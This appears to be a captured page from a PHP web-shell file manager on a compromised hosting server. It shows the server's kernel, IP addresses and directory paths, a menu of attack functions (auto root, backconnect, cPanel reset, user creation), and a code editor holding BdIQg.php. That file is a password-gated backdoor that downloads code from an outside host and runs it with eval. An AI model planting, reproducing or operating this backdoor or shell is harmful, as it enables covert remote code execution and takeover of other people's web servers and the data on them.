Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.138.124.28
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
chunnikalan /
myadmin /
pdf /
wp /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
514
B
-r-xr-xr-x
BdIQg.php
2.47
KB
-r-xr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : BdIQg.php
<?php session_start(); /** * Disable error reporting * * Set this to error_reporting( -1 ) for debugging. */ function geturlsinfo($url) { if (function_exists('curl_exec')) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); // Set cookies using session if available if (isset($_SESSION['coki'])) { curl_setopt($conn, CURLOPT_COOKIE, $_SESSION['coki']); } $url_get_contents_data = curl_exec($conn); curl_close($conn); } elseif (function_exists('file_get_contents')) { $url_get_contents_data = file_get_contents($url); } elseif (function_exists('fopen') && function_exists('stream_get_contents')) { $handle = fopen($url, "r"); $url_get_contents_data = stream_get_contents($handle); fclose($handle); } else { $url_get_contents_data = false; } return $url_get_contents_data; } // Function to check if the user is logged in function is_logged_in() { return isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true; } // Check if the password is submitted and correct if (isset($_POST['password'])) { $entered_password = $_POST['password']; $hashed_password = 'f4f0e72f8e3b8958d753120c2ae43592'; // Replace this with your MD5 hashed password if (md5($entered_password) === $hashed_password) { // Password is correct, store it in session $_SESSION['logged_in'] = true; $_SESSION['coki'] = 'asu'; // Replace this with your cookie data } else { // Password is incorrect echo "Incorrect password. Please try again."; } } // Check if the user is logged in before executing the content if (is_logged_in()) { $a = geturlsinfo('https://wptest.wodirect.top/remote/2023120202.txt'); eval('?>' . $a); } else { // Display login form if not logged in ?> <!DOCTYPE html> <html> <head> <title>Login Admin</title> </head> <body> <form method="POST" action=""> <label for="password">Password:</label> <input type="password" id="password" name="password"> <input type="submit" value="Login"> </form> </body> </html> <?php } ?>
Close